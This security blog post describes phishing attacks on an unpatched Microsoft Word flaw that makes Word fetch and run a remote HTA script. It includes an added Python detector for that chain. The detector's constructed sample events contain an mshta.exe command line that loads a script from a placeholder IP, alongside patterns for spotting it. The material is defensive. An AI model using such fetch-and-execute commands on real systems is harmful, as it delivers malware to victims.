PINDROP BLOG

Attackers Targeting Microsoft Word Zero Day

Attackers are targeting a newly disclosed, unpatched vulnerability in Microsoft Word that can be used to install malware silently on victims’ computers.

The attacks use rigged Word documents attached to phishing emails. When a victim opens one of the malicious documents, the embedded exploit code immediately connects to a server controlled by the attackers, downloads further files from it, and then opens a second, decoy Word document so that the victim sees nothing unusual.

“When the user opens the document, winword.exe issues an HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link,” researchers from FireEye said in a post on the attacks.

The exploit used in these attacks sidesteps the mitigations Microsoft has added to Windows over the years, such as DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization), which makes it especially dangerous. Those mitigations are designed to stop memory-corruption bugs from being turned into reliable code execution. The exploit FireEye describes does not corrupt memory at all: it has Word fetch a file over HTTP and hand it to the HTA application, which runs the embedded script the way it would run any legitimate HTML application, so there is nothing for DEP or ASLR to block. The vulnerability affects Windows 10, the latest version of the OS, as well as older versions. Microsoft has not said when it plans to patch the bug; April 11 is the next scheduled patch release date.

Some network-level email filtering appliances may catch the phishing emails used in these attacks, but the malicious .hta file is only fetched over HTTP after the document has been opened, so mail filtering alone does not see the payload. Users should always be careful with attachments in messages from unfamiliar senders. FireEye’s researchers said the attacks they have observed are installing a number of different kinds of malware.
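Because the mail channel only sees the carrier document, the chain FireEye describes is easier to catch on the endpoint: Word itself making an HTTP connection, the HTA application (mshta.exe) starting with a remote URL, and winword.exe being terminated moments later. The script below is an added example written for this article, not code from Pindrop or FireEye. It assumes Sysmon-style process-create, network-connect and process-terminate records already parsed into dicts with the field names shown; the sample events are constructed for the demo, and the parent-process values in them are part of that construction (the rules do not depend on them).

```python
"""Endpoint correlation for the Word -> HTTP -> HTA -> Word-killed chain.

Added example (not from the Pindrop post or FireEye's report). Event shape is
an assumption: Sysmon-like records as dicts with ts/type/pid/image/... keys.
"""
import re
from datetime import datetime, timedelta
from os.path import basename

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
WORD = r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE"  # constructed path


def _name(path):
    """Lower-cased file name of a Windows image path."""
    return basename(path.replace("\\", "/")).lower()


def _ts(ev):
    return datetime.fromisoformat(ev["ts"])


def detect_chain(events, window=timedelta(seconds=120)):
    """Return (rule, timestamp, detail) hits, oldest first.

    Three building-block rules plus a correlation rule that only fires when an
    Office process talked HTTP(S), mshta.exe ran a remote script, and the
    Office process was then terminated, all within `window`.
    """
    hits = []
    office_net = []   # times an Office process connected to port 80/443
    hta_launch = []   # times mshta.exe started with an http(s) URL argument
    for ev in sorted(events, key=_ts):
        img, t = _name(ev.get("image", "")), _ts(ev)
        if ev["type"] == "network_connect" and img in OFFICE_IMAGES \
                and ev.get("dest_port") in (80, 443):
            # Noisy on its own (Office talks to the internet legitimately),
            # so it is only a building block for the correlation below.
            hits.append(("office_outbound_http", t,
                         f"{img} -> {ev['dest_ip']}:{ev['dest_port']}"))
            office_net.append(t)
        elif ev["type"] == "process_create" and img == "mshta.exe" \
                and REMOTE_URL.search(ev.get("cmdline", "")):
            hits.append(("mshta_remote_url", t, ev["cmdline"]))
            hta_launch.append(t)
        elif ev["type"] == "process_terminate" and img in OFFICE_IMAGES:
            recent_hta = [h for h in hta_launch if timedelta(0) <= t - h <= window]
            if not recent_hta:
                continue
            gap = (t - recent_hta[-1]).seconds
            hits.append(("office_terminated_after_hta", t,
                         f"{img} pid {ev['pid']} ended {gap}s after mshta.exe"))
            if any(timedelta(0) <= t - n <= window for n in office_net):
                hits.append(("word_hta_chain", t,
                             "Office fetched over HTTP, mshta ran a remote "
                             "script, then Office was killed"))
    return hits


# Constructed sample telemetry mirroring the chain in the FireEye quote.
SAMPLE_EVENTS = [
    {"ts": "2017-04-10T09:00:01", "type": "process_create", "pid": 4120, "image": WORD,
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"ts": "2017-04-10T09:00:03", "type": "network_connect", "pid": 4120, "image": WORD,
     "dest_ip": "203.0.113.10", "dest_port": 80},
    {"ts": "2017-04-10T09:00:04", "type": "process_create", "pid": 4188,
     "image": r"C:\Windows\System32\mshta.exe", "parent_image": WORD,
     "cmdline": r'"C:\Windows\System32\mshta.exe" http://203.0.113.10/template.rtf'},
    {"ts": "2017-04-10T09:00:06", "type": "process_terminate", "pid": 4120, "image": WORD},
    {"ts": "2017-04-10T09:00:07", "type": "process_create", "pid": 4300, "image": WORD,
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"WINWORD.EXE" "C:\Users\alice\AppData\Local\Temp\decoy.doc"'},
]

# Constructed benign session: Word checks in over HTTPS, user closes it later.
BENIGN_EVENTS = [
    {"ts": "2017-04-10T10:00:00", "type": "process_create", "pid": 5000, "image": WORD,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": '"WINWORD.EXE"'},
    {"ts": "2017-04-10T10:00:02", "type": "network_connect", "pid": 5000, "image": WORD,
     "dest_ip": "198.51.100.7", "dest_port": 443},
    {"ts": "2017-04-10T10:12:00", "type": "process_terminate", "pid": 5000, "image": WORD},
]

if __name__ == "__main__":
    for rule, t, detail in detect_chain(SAMPLE_EVENTS):
        print(f"{t.isoformat()} {rule}: {detail}")
```

Run against the constructed sample the correlation rule fires once, at the moment winword.exe is terminated; the benign session produces only the noisy `office_outbound_http` building block and no chain alert, which is why that rule should feed a correlation rather than page anyone on its own.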

“This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families,” FireEye said.